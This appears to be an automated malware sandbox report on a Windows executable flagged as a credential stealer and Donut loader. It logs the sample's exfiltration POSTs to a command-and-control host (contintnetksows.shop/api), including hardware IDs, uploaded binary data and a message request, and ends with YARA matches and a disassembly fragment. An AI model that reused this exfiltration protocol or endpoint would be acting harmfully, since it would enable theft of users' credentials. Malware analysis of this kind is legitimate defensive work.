                2024-07-02 06:33:00 UTC1261OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:33:00 UTC812INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:00 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=teb1n5ri1t1sesk20po3ksmr2a; expires=Sat, 26-Oct-2024 00:19:39 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6hUTsGqnbUKWjlBGg3%2FU%2BwZdQhtyNdZy1zZd89AcrCtzyF0ozbMk3jn0xlR7PIzSbqHvN43whapuPngsOCGcwFJJCJcLXyr5T9BrIPGVG2urcEG6DZL%2BagK%2BfwPFzdIc3%2FL8hoeUGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a0fdb650c9d-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:33:00 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 33 33 0d 0a
                Data Ascii: eok 8.46.123.33
                2024-07-02 06:33:00 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                7192.168.2.549719172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:33:01 UTC287OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 586400
                Host: contintnetksows.shop
                2024-07-02 06:33:01 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 53 31 5a 72 6c 48 2d 2d 0d 0a 2d 2d 62
                Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"1440C7F4F4D84ED7471BB206B02395B1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"S1ZrlH----b
                2024-07-02 06:33:01 UTC15331OUTData Raw: 7c 70 e7 93 58 d4 db 70 4a 73 53 2d c1 ba 17 0a a9 0b 59 51 75 79 84 15 b2 79 a8 b8 e8 8d f1 4c 85 ae 41 8b 94 5c f5 53 83 31 d8 bd 59 70 4d ad d7 1e 72 4f 70 be 06 2d 11 34 ca f7 9e 05 c1 ed 83 6a 81 58 60 2a f9 85 31 94 7e 73 f3 4d d9 63 c5 52 76 e2 ed 66 12 48 f8 5d 6c 0d fc 7e 80 31 31 54 cb b8 ce f6 19 47 61 c0 89 cf d4 08 b9 4f d4 d3 20 38 0b 0f 8b a2 23 f4 13 21 36 60 4d f3 83 9c fb 28 2a 9a 8b da 7a 05 d5 25 f3 6d 8a 71 4b f9 80 35 c5 6d 15 c0 8a bf 8a 1c a7 51 b3 59 98 a7 bf cb 89 1e 80 83 b3 c3 71 34 1d 80 e4 60 ff bb 1d c6 1b a4 82 71 91 35 e9 7d 08 64 62 6c 3f 78 44 62 a9 ad 8f 28 eb 61 66 79 5f dd b0 82 e2 40 25 3a f2 0b c8 0a 58 ff 5e 7a 05 d0 07 84 15 f6 7b 00 5f d7 12 7e 1d 64 1e 93 3c 46 eb b4 71 79 3e 75 a9 9a 85 a7 be e3 07 22 65 d0 ad
                Data Ascii: |pXpJsS-YQuyyLA\S1YpMrOp-4jX`*1~sMcRvfH]l~11TGaO 8#!6`M(*z%mqK5mQYq4`q5}dbl?xDb(afy_@%:X^z{_~d<Fqy>u"e
                2024-07-02 06:33:01 UTC15331OUTData Raw: 53 e1 17 97 44 a2 6f 95 d9 ec 92 d8 21 44 5a a8 aa 6b 1b 0c 26 4e 79 79 d9 8d 64 79 4f a9 de de ec 33 15 e6 e7 5f 75 2c a3 3e 05 02 c5 28 d2 9f 6e cc 91 be 79 24 3e 5b 50 83 6b 4e a4 e1 3f 9c 26 99 d6 0f 28 a5 de 0d df 37 d9 a8 c7 52 b8 e4 c8 e8 16 ef 15 05 79 47 af a0 9a b2 32 bb 18 b5 73 5a 6f 97 57 6f 0f 86 e8 6c 77 0f fa 77 9c 9c 6b 92 bd ee 5f c7 fd 72 7d 70 90 3d 30 e3 c2 1a 4d 82 c8 59 c3 b1 f7 9d c6 5b 75 97 55 82 5a 34 9a cb 7f 6c 49 1a 9e 09 7e 1f fd e2 ad 2d 35 e8 32 0e 14 70 cc b6 74 89 80 bc 96 a6 37 e1 e3 cb bb bc 30 5f d1 d1 10 f0 7b e4 b0 68 80 75 9e 82 07 5b 25 60 a3 52 70 f3 13 60 7d 45 8c 98 dc 9f 89 47 c0 d3 9b bf f7 cf 2e 9c 2f b1 43 0a 85 00 d1 8a 77 a6 fc ff 77 99 92 7b 20 9a 72 0e d1 27 40 1c 75 cb ef 2f 1e 22 7a 08 52 09 10 35 36
                Data Ascii: SDo!DZk&NyydyO3_u,>(ny$>[PkN?&(7RyG2sZoWolwwk_r}p=0MY[uUZ4lI~-52pt70_{hu[%`Rp`}EG./Cww{ r'@u/"zR56
                2024-07-02 06:33:01 UTC15331OUTData Raw: d9 13 01 f1 72 af bc 2a 6f b1 2f 78 16 8a 48 5f e4 01 5f e6 75 a8 ec b5 a5 4e 80 ff 57 13 6c 80 cf 19 55 1d 43 f7 c9 33 8e ba 0f 84 52 77 cf 42 c0 bd 60 2f c0 26 d4 c8 0d 9d 27 40 83 f9 4b 5c d4 83 a9 91 16 ca 80 e4 4e 37 7e cf bf ba cb a5 e5 28 70 6a 73 6a 99 ea f4 ed 4b c5 0f 9d 9d bb 57 3f 70 d2 df 8e f1 53 0f 3a 50 2e 79 68 d3 ac 0a 60 de bb 9f 86 10 15 7e c1 ac e7 84 9c af 2f 38 89 1c cd 07 ea 03 84 d4 a9 c1 8f 0b 9a 01 5d b7 16 c7 8f 70 7c af 6a 6e d5 8b dc 30 13 19 91 22 8e bc f8 13 30 e6 71 aa 62 28 80 4a 43 14 3d a9 09 9f 58 aa 19 7d b3 bb dc 5e 50 ac e0 3e 32 b1 f5 eb 92 ee d2 0d 81 3b 79 8c 80 37 0d f4 22 1d fd 0b df e0 c4 af 26 d4 df d7 b8 f0 f7 ad 5a c3 74 76 5b bb 59 8f 41 cb c4 5b 5f 45 2d ad 4f fc a5 33 69 f5 cf fe 59 0d 93 8f bc df b6 b5
                Data Ascii: r*o/xH__uNWlUC3RwB`/&'@K\N7~(pjsjKW?pS:P.yh`~/8]p|jn0"0qb(JC=X}^P>2;y7"&Ztv[YA[_E-O3iY
                2024-07-02 06:33:01 UTC15331OUTData Raw: 29 d7 4e 49 30 42 dd e9 9e 11 7b c1 0d 85 e0 31 77 25 55 de 94 5a 1a e2 cd f5 a7 67 3b 82 c9 76 5c 2f 19 5a 45 ca 46 98 25 2c a0 d3 60 bd 36 38 2d 49 50 dc 7e 29 a5 e3 34 16 8f 39 0c ce 0b 72 d5 0b f6 0e 1e 39 ea 59 0f 63 36 6e 92 d2 05 b4 fe 6f 91 fe ff 77 b9 ca 0b d6 26 61 09 28 90 36 2f 48 f2 07 37 91 5a 48 a0 7b 76 38 8d 88 a2 44 93 25 d1 5c 2c a9 4a e6 56 39 c8 82 7f c1 01 e4 b4 c2 3c ef 7b 41 70 93 d7 fb 6c 04 c6 19 9f 43 ad 6e 7c fe e8 41 c6 3f 2e d8 8c e4 a7 f5 ba f1 4c 28 75 86 57 1f 87 22 2b b9 bc 95 2b 03 c0 41 3b ec b5 22 2c 5b 2a 89 68 99 1a 02 9b 36 4a b2 54 a0 76 ef 6f 5a a2 1f 05 59 ad dc e3 12 3d ec 90 d9 fb fb f8 1f 62 6e 1d 19 40 b6 04 79 0b 82 7d cb 1d 95 e4 a3 3b 94 9d 44 cf 5a 51 00 5f 3f a3 1b 56 b6 c7 10 e2 a1 d6 b3 8b 0a d3 39 60
                Data Ascii: )NI0B{1w%UZg;v\/ZEF%,`68-IP~)49r9Yc6now&a(6/H7ZH{v8D%\,JV9<{AplCn|A?.L(uW"++A;",[*h6JTvoZY=bn@y};DZQ_?V9`
                2024-07-02 06:33:01 UTC15331OUTData Raw: 9c 9c 05 51 31 c6 8b dd 57 ce bd 62 7d aa a7 0f fd e4 34 b2 34 c7 a1 e1 01 14 59 61 f9 5c a3 4a eb 1b 85 24 ba f5 cb 93 26 d2 30 01 33 75 9c 4c 26 d7 1b 46 87 08 6c e8 aa b4 1d 11 0a fe c0 38 60 75 b0 98 23 09 0e 4a 1f 77 21 8e 01 d3 02 76 a4 4d 1b 30 32 ee e8 cf 61 56 b8 38 d7 ae 19 c4 b3 6f 5d a2 b8 1e 21 a6 4b 11 7a 72 0b d3 8b 3d e8 bf 76 e4 16 18 6b 08 23 f6 cd a3 c7 ff ec 66 b9 49 81 a5 f4 fd e4 ad f1 38 55 6b 97 be f8 af 2b de 10 dd 89 1f fd dd c6 26 71 ee 6b ac d3 f5 5d 38 87 f5 78 78 59 ec 8c 7d 1b 8e ee 32 be f1 db b2 30 81 17 43 a4 5e 12 8b 0b 6e d4 9d 90 44 dd 12 a1 e4 ae a8 8d ca 96 24 25 79 69 1e 1a 4f 2c ba af 8d 52 55 d8 2c dd a1 22 8d da f8 48 fb 22 37 41 cf 6c 66 8f 18 29 c0 fd 48 b3 3d 82 02 97 c7 54 b8 11 9b a2 84 85 36 14 cc 8c 85 18
                Data Ascii: Q1Wb}44Ya\J$&03uL&Fl8`u#Jw!vM02aV8o]!Kzr=vk#fI8Uk+&qk]8xxY}20C^nD$%yiO,RU,"H"7Alf)H=T6
                2024-07-02 06:33:01 UTC15331OUTData Raw: 45 32 c2 75 4f 1c 16 c6 04 a5 6c 26 eb a0 db b6 ee 76 3f d0 91 f0 da 8e 0d bb c0 ce 12 21 d9 ae 85 ab 3b 84 47 c1 28 9c 47 50 1c 3a c2 c2 f8 c1 f5 a5 1d e0 45 47 ab 89 51 78 c8 94 40 83 f6 48 bd 61 36 9c c8 b0 76 ae 4e 15 cb 15 a3 60 23 0c 73 88 a7 b2 e9 84 6f a6 78 1e 1e 0c 09 fc 0c a2 55 bd 59 de ef c9 47 75 3e 42 71 2e 53 49 0b 95 87 be 3c 45 91 61 93 99 c3 74 86 da 40 a8 25 2b 45 57 50 e5 7b b9 f8 b9 9e a3 42 54 5c 20 2e a5 51 9a 1a 1d 28 b0 e1 be 07 9f 16 56 c1 37 11 3b bf 90 6f aa fb 25 88 9f 55 14 1b 9c ae da ed 86 10 19 a9 14 1c 93 b5 1c 78 de 29 e3 4b e4 6a be e7 ee fb 10 f1 2b c9 66 03 7a c7 49 36 15 5c 28 61 b5 d6 aa 01 fc b8 0a 7d 60 ae bf 32 5b 58 d3 33 1e 29 af 14 73 de 10 fb d8 89 9e 52 b7 64 03 26 85 37 37 ff 45 91 db bf d0 ca bb 7a 76 fd
                Data Ascii: E2uOl&v?!;G(GP:EGQx@Ha6vN`#soxUYGu>Bq.SI<Eat@%+EWP{BT\ .Q(V7;o%Ux)Kj+fzI6\(a}`2[X3)sRd&77Ezv
                2024-07-02 06:33:01 UTC15331OUTData Raw: 41 53 52 9a 44 6e 31 06 f7 02 73 d4 99 be 07 e4 6a 63 3c de e1 1d c3 57 19 7b 47 9f 86 1e 39 1c 9b 34 5e d5 85 01 8d 3f a1 b8 f2 39 b9 80 3f e0 1b ef 8f ff d3 4d c1 37 9b f7 98 e1 19 5f 87 ba a0 75 f7 77 17 35 fd 68 f6 dc 6f d6 7f 44 54 b9 9f fb 78 2f 75 fb 36 ab 3a fe fb 30 fe ce c2 50 61 ee 58 a6 17 e3 c4 dc 25 65 fe 16 a8 23 ef f7 ca 88 d2 15 d6 45 66 f2 d2 f2 7c eb 79 76 47 a7 da 7d 81 44 01 b0 ad e5 5e 2b 3f 23 a2 b6 7b e4 ff c3 d4 9b c7 43 bd 86 ff ff f7 7b 16 33 c6 32 43 f6 75 a4 4d 11 a5 c5 12 33 54 38 47 8b 52 21 61 a4 50 b6 91 7d 9d b1 c5 29 a1 d3 42 65 99 56 8a ac 91 14 c6 52 14 a1 ec fb d8 f7 7d 19 cc f6 9b ce e7 fb f9 7e 7f ff 54 f4 60 b6 eb be ae eb f5 7c dd f7 75 87 94 5d bf 08 ee cf af cc 6d fe 72 06 81 df ce ae b8 78 b3 63 6d 44 70 10 79
                Data Ascii: ASRDn1sjc<W{G94^?9?M7_uw5hoDTx/u6:0PaX%e#Ef|yvG}D^+?#{C{32CuM3T8GR!aP})BeVR}~T`|u]mrxcmDpy
                2024-07-02 06:33:01 UTC15331OUTData Raw: b5 a1 7e 86 b4 f9 bb 64 2d aa 0e d2 1f e1 eb bb a5 36 fa b2 f5 ac 5d 38 22 34 f4 12 f4 82 af 5d fe 89 6b 02 d7 66 a5 3d e8 ee 08 01 90 7a 27 23 9b ae 0f d3 35 89 ec 9e cf fe ca 77 61 7a 56 b3 59 ee cf f2 0c ce ea 82 35 b7 ec df da a0 f7 2f 17 10 3e 61 55 81 ae 9d 11 37 ed 74 39 96 a6 5c b9 d4 9a 73 eb 37 db 64 0a 55 a5 cc 14 b0 98 94 0f 1d 6a 7a 69 fc 32 af 84 b5 eb fa 82 e0 09 f7 9e 58 a6 fd 87 6b 7c c4 20 fe e2 51 df a0 18 95 71 42 7f c3 bf b8 8b 3c 77 bb e9 5a 95 7d f7 d6 09 38 dd 9f 98 df 5a ac 28 0b 1e 97 c0 e0 e4 7b 62 32 0a c5 df c4 80 3f 9c ab d7 5e 6b 7a bb 01 1a 36 fb 71 22 e7 f2 d7 68 7e 4d d2 31 cf 3f f1 12 8a 50 14 5a 4c c4 93 45 fb a9 cf 7c 9e 13 11 9e 95 b4 9e 2f ef 45 31 30 74 c5 0c 95 df 9e 3f 3c f9 69 1f 99 d1 13 50 8e 93 36 79 6e c6 63
                Data Ascii: ~d-6]8"4]kf=z'#5wazVY5/>aU7t9\s7dUjzi2Xk| QqB<wZ}8Z({b2?^kz6q"h~M1?PZLE|/E10t?<iP6ync
                2024-07-02 06:33:01 UTC15331OUTData Raw: 97 06 98 ad 78 af 23 02 c4 58 61 3c 0e f6 32 8c ee 61 07 e8 1f 07 c3 f5 6d 3f 7a da ad cf 16 35 3b b7 4e 68 28 1d 45 ff 9f 41 1e 3a ba 72 91 7c b8 3a 0b 48 fb 36 3a 45 85 cf 5c 02 3a 7b b5 8e fe 05 48 41 21 8b ce 9a 91 f4 83 de 19 f3 6b b8 c5 a7 5f cc 76 48 dd 6d 3c b1 a3 2b a2 32 c8 e6 88 16 a1 93 06 8f a4 46 82 48 6a 04 88 e5 ba bd 2c 1d bd 85 42 68 da 3e 88 aa 34 6f 91 f9 b2 2b db ae e2 48 b6 9d 5c 47 f8 07 bd ec 2b 1b c1 0f 6c b1 2d 89 16 f9 83 50 35 1a 58 e6 9f bd 50 3e f9 1e cd 19 3e 00 a3 37 5d 30 57 f8 78 14 b8 23 79 7c a2 ff ec 43 da 9f e9 47 d4 5e 21 f0 38 a2 e2 12 48 ca cf 7b 74 19 22 2a 58 12 f9 7f 57 57 8a 4f 5a 9d a5 56 49 80 9c 30 4e cc 8e 55 4b 88 fd a8 8a 10 79 2c c4 e3 39 69 5a 56 88 97 15 ac af bb 88 82 04 8c 39 99 86 b6 fc de fa 23 2d
                Data Ascii: x#Xa<2am?z5;Nh(EA:r|:H6:E\:{HA!k_vHm<+2FHj,Bh>4o+H\G+l-P5XP>>7]0Wx#y|CG^!8H{t"*XWWOZVI0NUKy,9iZV9#-
                2024-07-02 06:33:03 UTC804INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:03 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=5o2fs9hbm952q1j0qhc27qu568; expires=Sat, 26-Oct-2024 00:19:42 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lns8MVWci9z3646IhDNKdKIUnrF6wDmjLBu64OvY%2BSbn14nPW2nTB74b42iAAXFR14YYXVWma4Ef12uVJUGeegXIxATvoMExqdTN6Z9YYXFEWLkxEfuAJGE175XdHuXDSK5IEhAUXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a194f940cb0-EWR
                alt-svc: h3=":443"; ma=86400


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                8192.168.2.549724172.67.141.2344433276C:\Users\user\Desktop\6RVmzn1DzL.exe
                TimestampBytes transferredDirectionData
                2024-07-02 06:33:04 UTC268OUTPOST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 77
                Host: contintnetksows.shop
                2024-07-02 06:33:04 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 53 31 5a 72 6c 48 2d 2d 26 6a 3d 26 68 77 69 64 3d 31 34 34 30 43 37 46 34 46 34 44 38 34 45 44 37 34 37 31 42 42 32 30 36 42 30 32 33 39 35 42 31
                Data Ascii: act=get_message&ver=4.0&lid=S1ZrlH--&j=&hwid=1440C7F4F4D84ED7471BB206B02395B1
                2024-07-02 06:33:04 UTC812INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 06:33:04 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: close
                Set-Cookie: PHPSESSID=vvaakkv2djjieei82ug5iq1urt; expires=Sat, 26-Oct-2024 00:19:43 GMT; Max-Age=9999999; path=/
                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                Cache-Control: no-store, no-cache, must-revalidate
                Pragma: no-cache
                CF-Cache-Status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2BeDuDQLsREOI%2FejauWYmPl7h%2FtRGyPg1usxEnKByjYG2KWsUSUGgds7LtSac94FNwiRvYR%2BNuEYGLvwMO919mvOgLPEU2Sl%2BMywM6GjxBDuBvEnxfEjgud%2F6O2iHU1CxzyHUS4LrA%3D%3D"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc9a2b4dff1871-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 06:33:04 UTC54INData Raw: 33 30 0d 0a 35 35 75 35 72 57 69 57 68 31 63 6f 4b 66 77 58 47 77 36 64 37 6c 59 59 73 79 63 34 75 79 56 53 43 76 72 53 4d 50 6c 64 4e 39 53 38 78 67 3d 3d 0d 0a
                Data Ascii: 3055u5rWiWh1coKfwXGw6d7lYYsyc4uyVSCvrSMPldN9S8xg==
                2024-07-02 06:33:04 UTC5INData Raw: 30 0d 0a 0d 0a
                Data Ascii: 0


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:02:32:40
                Start date:02/07/2024
                Path:C:\Users\user\Desktop\6RVmzn1DzL.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\6RVmzn1DzL.exe"
                Imagebase:0x620000
                File size:587'168 bytes
                MD5 hash:4D73427DC0B9F3DC4B846ACE0DDC2DEB
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134709895.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169631101.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173115481.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172101207.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172144861.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171028826.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184883845.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173067791.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169734617.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2146970871.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172193519.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2184975566.000000000129C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2173166393.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172553659.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169841137.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2169785015.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134170058.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171729321.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172598714.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2147519719.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171193363.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171140734.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2134331985.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171672150.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2171626305.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185121742.000000000125A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2172650183.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2157605388.000000000129B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2185006913.0000000001259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                Reputation:low
                Has exited:true

                General

                Target ID:5
                Start time:02:33:03
                Start date:02/07/2024
                Path:C:\Windows\SysWOW64\WerFault.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
                Imagebase:0x200000
                File size:483'680 bytes
                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:6.7%
                  Dynamic/Decrypted Code Coverage:68.1%
                  Signature Coverage:20.7%
                  Total number of Nodes:511
                  Total number of Limit Nodes:37
                  execution_graph 39670 31d1f9d 39672 31d1fa8 39670->39672 39671 31d2046 39672->39671 39674 3205f22 RtlAllocateHeap 39672->39674 39675 6227e6 39676 6227f6 39675->39676 39677 6229b9 ImageList_Draw SetWindowLongW 39675->39677 39678 6229a4 39676->39678 39679 6227ff 39676->39679 39680 622893 39677->39680 39678->39680 39681 6229ad 39678->39681 39682 622808 39679->39682 39686 622905 39679->39686 39751 622775 29 API calls 39681->39751 39684 622813 39682->39684 39685 6228f8 39682->39685 39687 622816 39684->39687 39688 62286d 39684->39688 39750 621474 48 API calls 39685->39750 39686->39680 39696 622936 SetBkMode 39686->39696 39692 622841 39687->39692 39694 62281a 39687->39694 39690 622877 39688->39690 39691 6228e8 EndDialog 39688->39691 39693 62287c 39690->39693 39699 6228ce 39690->39699 39691->39680 39692->39680 39695 62284b GetWindowLongW 